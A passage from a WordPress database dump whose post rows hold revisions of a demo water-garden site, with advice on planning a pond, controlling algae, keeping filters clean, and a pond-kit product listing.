20:10:43','',21,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=45',0,'page','',0),(46,1,'2013-06-01 16:10:39','2013-06-01 20:10:39','','Step-by-Step Guide','','inherit','open','open','','45-revision','','','2013-06-01 16:10:39','2013-06-01 20:10:39','',45,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/45-revision/',0,'revision','',0),(47,1,'2013-06-01 16:11:24','2013-06-01 20:11:24','','Planning','','publish','open','open','','planning','','','2013-06-01 16:11:24','2013-06-01 20:11:24','',6,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=47',0,'page','',0),(48,1,'2013-06-01 16:11:19','2013-06-01 20:11:19','','Planning','','inherit','open','open','','47-revision','','','2013-06-01 16:11:19','2013-06-01 20:11:19','',47,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/47-revision/',0,'revision','',0),(49,1,'2013-06-01 16:12:12','2013-06-01 20:12:12','','Step-by-Step Guide','','publish','open','open','','step-by-step-guide','','','2013-06-01 16:12:12','2013-06-01 20:12:12','',6,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=49',0,'page','',0),(50,1,'2013-06-01 16:11:50','2013-06-01 20:11:50','','Step-by-Step Guide','','inherit','open','open','','49-revision','','','2013-06-01 16:11:50','2013-06-01 20:11:50','',49,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/49-revision/',0,'revision','',0),(51,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','51','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',6,'http://wpclass.thegammonpress.com/ed2goclass/?p=51',3,'nav_menu_item','',0),(52,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','52','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',6,'http://wpclass.thegammonpress.com/ed2goclass/?p=52',5,'nav_menu_item','',0),(53,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','53','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',21,'http://wpclass.thegammonpress.com/ed2goclass/?p=53',7,'nav_menu_item','',0),(54,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','54','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',21,'http://wpclass.thegammonpress.com/ed2goclass/?p=54',8,'nav_menu_item','',0),(55,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','55','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',21,'http://wpclass.thegammonpress.com/ed2goclass/?p=55',9,'nav_menu_item','',0),(56,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','56','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',23,'http://wpclass.thegammonpress.com/ed2goclass/?p=56',12,'nav_menu_item','',0),(57,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','57','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',23,'http://wpclass.thegammonpress.com/ed2goclass/?p=57',11,'nav_menu_item','',0),(58,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','58','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',23,'http://wpclass.thegammonpress.com/ed2goclass/?p=58',13,'nav_menu_item','',0),(59,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','59','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',25,'http://wpclass.thegammonpress.com/ed2goclass/?p=59',17,'nav_menu_item','',0),(60,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','60','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',25,'http://wpclass.thegammonpress.com/ed2goclass/?p=60',16,'nav_menu_item','',0),(61,1,'2013-06-02 09:54:51','2013-06-02 13:54:51',' ','','','publish','open','open','','61','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',25,'http://wpclass.thegammonpress.com/ed2goclass/?p=61',15,'nav_menu_item','',0),(74,1,'2013-06-01 16:01:56','2013-06-01 20:01:56','','Add Flowers & Plants','','inherit','open','open','','21-revision','','','2013-06-01 16:01:56','2013-06-01 20:01:56','',21,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/21-revision/',0,'revision','',0),(63,1,'2013-06-02 14:13:48','2013-06-02 18:13:48','','Liner','','inherit','open','open','','liner-folded','','','2013-06-02 14:13:48','2013-06-02 18:13:48','',6,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/liner-folded.jpg',0,'attachment','image/jpeg',0),(64,1,'2013-06-02 14:15:00','2013-06-02 18:15:00','','Preformed structure','','inherit','open','open','','preformed','','','2013-06-02 14:15:00','2013-06-02 18:15:00','',6,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/preformed.jpg',0,'attachment','image/jpeg',0),(65,1,'2013-06-02 14:15:09','2013-06-02 18:15:09','','A waterfall makes an attractive addition to a water garden.','','inherit','open','open','','waterfall-slider','','','2013-06-02 14:15:09','2013-06-02 18:15:09','',6,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg',0,'attachment','image/jpeg',0),(67,1,'2013-06-02 14:16:38','2013-06-02 18:16:38','<a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/liner-folded.jpg\"><img class=\"alignnone size-full wp-image-63\" alt=\"liner-folded\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/liner-folded.jpg\" width=\"225\" height=\"225\" /></a> <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/preformed.jpg\"><img class=\"alignnone size-medium wp-image-64\" alt=\"preformed\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/preformed.jpg\" width=\"297\" height=\"247\" /></a> <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg\"><img class=\"alignnone size-medium wp-image-65\" alt=\"waterfall-slider\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider-300x200.jpg\" width=\"300\" height=\"200\" /></a>\r\n\r\nBuilding a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','inherit','open','open','','6-revision-4','','','2013-06-02 14:16:38','2013-06-02 18:16:38','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision-4/',0,'revision','',0),(66,1,'2013-05-29 13:39:53','2013-05-29 17:39:53','Building a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','inherit','open','open','','6-revision-3','','','2013-05-29 13:39:53','2013-05-29 17:39:53','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision-3/',0,'revision','',0),(68,1,'2013-06-02 14:29:37','2013-06-02 18:29:37',' <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg\"><img class=\"alignnone size-medium wp-image-65\" title=\"A waterfall makes an attractive addition to a water garden.\" alt=\"waterfall-slider\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider-300x200.jpg\" width=\"300\" height=\"200\" /></a>\r\n\r\nBuilding a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','inherit','open','open','','6-revision-5','','','2013-06-02 14:29:37','2013-06-02 18:29:37','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision-5/',0,'revision','',0),(69,1,'2013-06-02 14:31:45','2013-06-02 18:31:45',' <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg\"><img class=\"size-medium wp-image-65 alignleft\" title=\"A waterfall makes an attractive addition to a water garden.\" alt=\"waterfall-slider\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider-300x200.jpg\" width=\"300\" height=\"200\" /></a>\r\n\r\nBuilding a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','inherit','open','open','','6-revision-6','','','2013-06-02 14:31:45','2013-06-02 18:31:45','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision-6/',0,'revision','',0),(70,1,'2013-06-02 14:37:25','2013-06-02 18:37:25',' <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg\"><img class=\"size-medium wp-image-65 alignleft\" title=\"A waterfall makes an attractive addition to a water garden.\" alt=\"waterfall-slider\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider-300x200.jpg\" width=\"300\" height=\"200\" /></a>\r\n\r\nBuilding a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> <a href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/attachment/preformed/\" rel=\"attachment wp-att-64\"><img class=\"alignright size-full wp-image-64\" alt=\"Preformed structure\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/preformed.jpg\" width=\"297\" height=\"247\" /></a>It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','inherit','open','open','','6-revision-7','','','2013-06-02 14:37:25','2013-06-02 18:37:25','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision-7/',0,'revision','',0),(71,1,'2013-06-06 13:25:39','2013-06-06 17:25:39','[si-contact-form form=\'1\']','Contact','','publish','open','open','','contact','','','2013-06-06 13:25:39','2013-06-06 17:25:39','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=71',0,'page','',0),(72,1,'2013-06-06 13:25:20','2013-06-06 17:25:20','[si-contact-form form=\'1\']','Contact','','inherit','open','open','','71-revision','','','2013-06-06 13:25:20','2013-06-06 17:25:20','',71,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/71-revision/',0,'revision','',0),(73,1,'2013-06-06 13:25:39','2013-06-06 17:25:39',' ','','','publish','open','open','','73','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/73/',20,'nav_menu_item','',0),(108,1,'2015-02-05 15:18:22','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2015-02-05 15:18:22','0000-00-00 00:00:00','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=108',0,'post','',0),(76,1,'2013-06-09 14:20:40','2013-06-09 18:20:40','<a href=\"http://wpclass.thegammonpress.com/\">This website contains some great advice for water gardeners.</a>\r\n\r\n','Add Flowers & Plants','','inherit','open','open','','21-revision-2','','','2013-06-09 14:20:40','2013-06-09 18:20:40','',21,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/21-revision-2/',0,'revision','',0),(77,1,'2013-06-09 14:58:09','2013-06-09 18:58:09','<p style=\"border:1px solid black; text-align:center;\"><a href=\"http://wpclass.thegammonpress.com/ed2goclass/\">This website contains some great advice for water gardeners.</a></p>\n\n','Add Flowers & Plants','','inherit','open','open','','21-autosave','','','2013-06-09 14:58:09','2013-06-09 18:58:09','',21,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/21-autosave/',0,'revision','',0),(78,1,'2013-06-09 14:22:58','2013-06-09 18:22:58','<a href=\"http://wpclass.thegammonpress.com/ed2goclass/\">This website contains some great advice for water gardeners.</a>\r\n\r\n','Add Flowers & Plants','','inherit','open','open','','21-revision-3','','','2013-06-09 14:22:58','2013-06-09 18:22:58','',21,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/21-revision-3/',0,'revision','',0),(79,1,'2013-05-29 13:32:48','2013-05-29 17:32:48','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n<ol>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\r\n</ol>\r\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\r\n\r\n \r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-revision-3','','','2013-05-29 13:32:48','2013-05-29 17:32:48','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-revision-3/',0,'revision','',0),(80,1,'2013-06-16 14:22:21','2013-06-16 18:22:21','','125x125-live_koi','','inherit','open','open','','125x125-live_koi','','','2013-06-16 14:22:21','2013-06-16 18:22:21','',0,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-live_koi.png',0,'attachment','image/png',0),(81,1,'2013-06-16 14:22:23','2013-06-16 18:22:23','','125x125-plants','','inherit','open','open','','125x125-plants','','','2013-06-16 14:22:23','2013-06-16 18:22:23','',0,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-plants.png',0,'attachment','image/png',0),(82,1,'2013-06-16 14:22:25','2013-06-16 18:22:25','','125x125-pond_pkgs','','inherit','open','open','','125x125-pond_pkgs','','','2013-06-16 14:22:25','2013-06-16 18:22:25','',0,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-pond_pkgs.png',0,'attachment','image/png',0),(83,1,'2013-06-16 14:22:27','2013-06-16 18:22:27','','125x125-your_ad','','inherit','open','open','','125x125-your_ad','','','2013-06-16 14:22:27','2013-06-16 18:22:27','',0,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/125x125-your_ad.png',0,'attachment','image/png',0),(84,1,'2013-06-16 14:39:17','2013-06-16 18:39:17','[eshop_show_cart]','Shopping Cart','','publish','closed','closed','','shopping-cart','','','2013-06-16 14:39:17','2013-06-16 18:39:17','',0,'http://wpclass.thegammonpress.com/ed2goclass/shopping-cart/',0,'page','',0),(85,1,'2013-06-16 14:39:17','2013-06-16 18:39:17',' ','','','publish','open','open','','85','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/85/',21,'nav_menu_item','',0),(86,1,'2013-06-16 14:39:17','2013-06-16 18:39:17','[eshop_show_checkout]','Checkout','','publish','closed','closed','','checkout','','','2013-06-16 14:39:17','2013-06-16 18:39:17','',84,'http://wpclass.thegammonpress.com/ed2goclass/shopping-cart/checkout/',0,'page','',0),(87,1,'2013-06-16 14:39:17','2013-06-16 18:39:17','[eshop_show_success]','Thank You for your order','','publish','closed','closed','','thank-you','','','2013-06-16 14:39:17','2013-06-16 18:39:17','',84,'http://wpclass.thegammonpress.com/ed2goclass/shopping-cart/thank-you/',0,'page','',0),(88,1,'2013-06-16 14:39:17','2013-06-16 18:39:17','[eshop_show_cancel]','Cancelled Order','','publish','closed','closed','','cancelled-order','','','2013-06-16 14:39:17','2013-06-16 18:39:17','',84,'http://wpclass.thegammonpress.com/ed2goclass/shopping-cart/cancelled-order/',0,'page','',0),(89,1,'2013-06-16 14:39:17','2013-06-16 18:39:17','[eshop_show_shipping]','Shipping Rates','','publish','closed','closed','','shipping-rates','','','2013-06-16 14:39:17','2013-06-16 18:39:17','',0,'http://wpclass.thegammonpress.com/ed2goclass/shipping-rates/',0,'page','',0),(90,1,'2013-06-16 14:39:17','2013-06-16 18:39:17',' ','','','publish','open','open','','90','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/90/',22,'nav_menu_item','',0),(91,1,'2013-06-16 14:39:17','2013-06-16 18:39:17','[eshop_show_downloads]','Downloads','','publish','closed','closed','','downloads','','','2013-06-16 14:39:17','2013-06-16 18:39:17','',0,'http://wpclass.thegammonpress.com/ed2goclass/downloads/',0,'page','',0),(92,1,'2013-06-16 14:39:17','2013-06-16 18:39:17',' ','','','publish','open','open','','92','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/92/',23,'nav_menu_item','',0),(93,1,'2013-06-16 15:00:43','2013-06-16 19:00:43','Water Garden Kits Content\r\n\r\n<a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\"><img class=\"alignleft size-full wp-image-94\" alt=\"american-pond-free-freedom-kit\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\" width=\"216\" height=\"147\" /></a>\r\nThese American Pond kits are incredibly easy to install. You\'ll be able to create a beautiful water garden in no time at all!\r\n\r\nThe Freedom series by American Pond is perfect for a backyard water garden. The American-Made skimmers and filters are extremely durable, and the underlayment is 25% thicker than the competition\'s. The pond liner is made by Firestone and comes with a 20 year warranty. Even the pumps are better!\r\n\r\nHere\'s what you\'ll get:\r\n\r\n• Biological 20.5\" Waterfall with Lifetime Warranty on body\r\n• Pond Skimmer-9\" Weir 4500 gph with Lifetime Warranty\r\n• 3100 GPH Waterfall Pump-3 year warranty\r\n• Firestone fish safe Pond Guard 45 mil EPDM liner-20 Year Warranty\r\n• Pond Underlayment\r\n• Filtration mats\r\n• Filter media bag\r\n• Skimmer basket\r\n• Water Treatment Kit\r\n• Easy to follow Instructions\r\n• Customer service tech support','American Pond Kits','','publish','open','open','','american-pond-kits','','','2013-06-23 13:39:13','2013-06-23 17:39:13','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=93',0,'post','',0),(94,1,'2013-06-16 14:55:26','2013-06-16 18:55:26','','american-pond-free-freedom-kit','','inherit','open','open','','american-pond-free-freedom-kit','','','2013-06-16 14:55:26','2013-06-16 18:55:26','',93,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif',0,'attachment','image/gif',0),(95,1,'2013-06-16 14:58:00','2013-06-16 18:58:00','Water Garden Kits Content\n\n<a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\"><img class=\"alignleft size-full wp-image-94\" alt=\"american-pond-free-freedom-kit\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\" width=\"216\" height=\"147\" /></a>\nThese American Pond kits are incredibly easy to install. You\'ll be able to create a beautiful water garden in no time at all!\n\nThe Freedom series by American Pond is perfect for a backyard water 